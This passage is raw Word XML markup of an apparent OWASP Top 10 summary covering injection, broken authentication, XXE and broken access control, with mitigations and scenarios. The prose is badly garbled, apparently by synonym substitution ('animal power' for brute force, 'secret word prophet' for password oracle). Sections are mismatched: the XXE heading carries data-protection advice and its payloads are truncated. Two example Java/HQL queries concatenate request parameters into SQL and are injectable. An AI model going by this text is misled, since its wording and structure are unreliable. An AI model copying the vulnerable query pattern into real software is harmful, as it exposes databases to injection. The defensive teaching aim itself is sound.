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181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A1-INJECTION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">Injection defects </w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t>like the NoSQL, Operating System, LDAP</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t xml:space="preserve"> and SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> happens when untrusted information is set to a </w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t>syntax</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t xml:space="preserve">query. The malicious </w:t>
      </w:r>
      <w:r>
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t xml:space="preserve"> of an attacker</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can trap he mediator into </w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t>performing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t>unintentional</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> charges or getting to information without le</w:t>
      </w:r>
      <w:r>
        <w:t>gitimate approval.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Mitigation/ How to Avoid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t>e favored choice is to utilize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t xml:space="preserve"> safety that</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> keeps away from the utilization of the mediator totally or gives a</w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t>n interface that is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameterized</w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">then again move to </w:t>
      </w:r>
      <w:r w:rsidR="00052FA3">
        <w:t>utilize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Object</w:t>
      </w:r>
      <w:r w:rsidR="009B5728">
        <w:t xml:space="preserve"> Relational Mapping (ORM) Tools</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Us</w:t>
      </w:r>
      <w:r>
        <w:t>e positive or ‘whitelist’ server-</w:t>
      </w:r>
      <w:r w:rsidR="009B5728">
        <w:t xml:space="preserve">side info approval. It is not </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a total barrier the same </w:t>
      </w:r>
      <w:r w:rsidR="009B5728">
        <w:t>numbers of utilizations require</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> uncommon characters for example content </w:t>
      </w:r>
      <w:r w:rsidR="009B5728">
        <w:t>places or portable applications in API.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>For any lingering dynamic inquiries, escape extraordin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ary characters </w:t>
      </w:r>
      <w:r w:rsidR="009B5728">
        <w:t>utilizing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the particular escape language structure for that translator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="009B5728">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Utilizing the</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> LIMIT and </w:t>
      </w:r>
      <w:r>
        <w:t>many other</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:t>commands</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> inside inquiries to avoid</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="009B5728">
      <w:r>
        <w:t xml:space="preserve">Situation #1: The application is utilizing the </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">untrusted </w:t>
      </w:r>
      <w:r>
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> in the construction of the following </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t>SQL call</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">String query = "SELECT * FROM accounts WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>custID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">='" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">"id") + "'"; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="009B5728">
      <w:r>
        <w:t xml:space="preserve">Situation </w:t>
      </w:r>
      <w:r>
        <w:t>#2: The blind trust application</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> in frameworks may </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">have an outcome </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">in queries that are </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">very vulnerable, (Ex. Hibernate Query </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Language )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Quer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HQLQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>session.createQuery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">"FROM accounts WHERE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>custID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">='" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("id") + "'"); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A2: BROKEN AUTHENTICATION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Application capacities identified with validation and session administration are regularly executed mistakenly, enabling aggres</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t xml:space="preserve">ors to bargain passwords, session tokens, or abusing </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">other usage imperfections to expect other clients’ personalities incidentally or permanently. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Mitigation/ How to Prevent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Where conceivable, actualize multi-factor confirmation to avoid compu</w:t>
      </w:r>
      <w:r>
        <w:t>terized, qualification stuffing, brute power, and stolen certification reuse attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do not dispatch or convey with any default certifications, especially for administrator clients. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement feeble secret word checks, for example, testing new or </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">passwords </w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t xml:space="preserve">that was changed </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">against </w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> rundown of the main 10000 most noticeably bad passwords. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Align secret word length, multifaceted nature and revolution arrangements with NIST 800-63 B's rules in segment 5.1.1 for Memorized Insider facts or other current, confirm based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> watchword approaches. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Ensure enlistment, certification recuperation, and API pathways are solidified against account count assaults by utilizing the same messages for all results. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Limit or progressively delay fizzled login endeavors. Log all disappointm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ents also, ready chairmen when accreditation stuffing, animal power, or different assaults are identified. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="004019C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Utilizing</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> server-side, </w:t>
      </w:r>
      <w:r>
        <w:t>secured</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">, worked in session chief that produces another irregular session </w:t>
      </w:r>
      <w:r>
        <w:t>identification</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">that has </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> high</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> entropy after </w:t>
      </w:r>
      <w:r>
        <w:t>logging in</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t>. Session IDs ought not be in the URL, be safely put away furthermore, nullified after logout, sit out of gear, and outright timeouts</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Sit</w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t xml:space="preserve">uation #1: Credential stuffing is </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">the utilization of arrangements of </w:t>
      </w:r>
      <w:r>
        <w:t>passwords</w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t xml:space="preserve"> that are known</w:t>
      </w:r>
      <w:r>
        <w:t>, is a typical assault. On the off chance that an application does not actualize mechanized risk or accreditation stuffing insurances, the application can be u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tilized as a secret word prophet to decide whether the certifications are legitimate. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">Situation #2: </w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t>Most of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> verification </w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t>attacks happen because of the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> proceeded with utilization of passwords as </w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sole factor. Once considered best practices, watchword turn and </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">multifaceted nature prerequisites are seen as urging clients to utilize, and reuse, frail passwords. Associations are prescribed to stop these rehearses per NIST 800-63 and utilize multi-factor verification. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Situation #3:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A client utilizes an open PC to get to an application. Rather than choosing "logout" the client basically shuts the program tab and leaves. An aggressor utilizes a similar program </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hour later, also, the client is as yet verified.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>4: XML EXTERNAL ENTITIES (XXE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Numerous has established or arranged XMP processors assess outside elements can be utilized to unveil inner documents utilizing the record URI handler, interior record shares, remote code execution, internal port checking, an</w:t>
      </w:r>
      <w:r>
        <w:t>d denial of administration assaults.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Mitigation/ How to prevent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Classify information handled, put away, or transmitted by an application. Recognize which information is delicate as indicated by protection laws, administrative necessities, or business need</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply controls according to the order. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Don't store delicate information superfluously. Dispose of it when conceivable or utilize PCI DSS consistent tokenization or even truncation. Information that isn't held can't be stolen. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Make beyond any doubt to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> encode every touchy datum very still. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Ensure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> progressive and solid standard calculations, conventions, furthermore, keys are set up; utilize appropriate key administration. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="004019C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Encrypt </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t>all information in travel with secure conventions, for example, TLS with</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> culminate forward mystery (PFS) figures, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prioritization of </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">figure </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">by the server, and </w:t>
      </w:r>
      <w:r>
        <w:t>securing the</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> parameters. Authorize encryption utilizing mandates </w:t>
      </w:r>
      <w:r>
        <w:t>such as the</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> HTTP Strict Transport Security (HSTS). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable reserving for reactions that contain delicate information. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>tore passwords utilizing so</w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t xml:space="preserve">lid versatile </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004019C1" w:rsidRDefault="004019C1" w:rsidP="004019C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">apacities with a work factor </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB" w:rsidP="004019C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Verify autonomously the viability of setup and settings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="004019C1">
      <w:r>
        <w:t xml:space="preserve">Situation #1: Attempting </w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00C07476">
        <w:t>remove</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C07476">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> the server</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BD47BB">
        <w:t>: ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BD47BB">
        <w:t>&gt; &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BD47BB">
        <w:t>xxe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BD47BB">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="004019C1">
      <w:r>
        <w:t>Situation #2: Probing</w:t>
      </w:r>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve"> the server's private network by changing the above ENTITY line to</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00BD47BB">
        <w:t>: ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00BD47BB">
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Sc</w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t xml:space="preserve">enario #3: Attempting </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a denial-of-service attack by </w:t>
      </w:r>
      <w:r w:rsidR="004019C1">
        <w:t xml:space="preserve">adding an </w:t>
      </w:r>
      <w:r>
        <w:t>endless file</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>: ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>A5: BROKEN ACCESS CONTROL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t xml:space="preserve">Restrictions on what validated clients are permitted to do are regularly not legitimately authorized. Attackers can abuse these flaws to get to unapproved usefulness or potentially information for example, get to other clients’ </w:t>
      </w:r>
      <w:r>
        <w:t>records, see touchy documents, alter other clients’ information and change rights.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00FE2181"/>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:r>
        <w:t>Mitigations/ How to prevent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement get to control systems once and re-utilize them through the application, including limiting CORS utilization. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Model access controls o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ught to implement record proprietorship, rather than tolerating that the client can make, read, refresh, or erase any record. Unique application business confine prerequisites ought to be implemented by space models. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t>Disable web server registry posting an</w:t>
      </w:r>
      <w:r>
        <w:t>d guarantee document metadata (e.g. .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">) and reinforcement records are absent inside web roots. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Log get to control disappointments, caution administrators when proper (e.g. rehashed disappointments). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:contextualSpacing/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rate constraint API and controller access to limit the mischief from computerized assault tooling. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE2181" w:rsidRDefault="00BD47BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
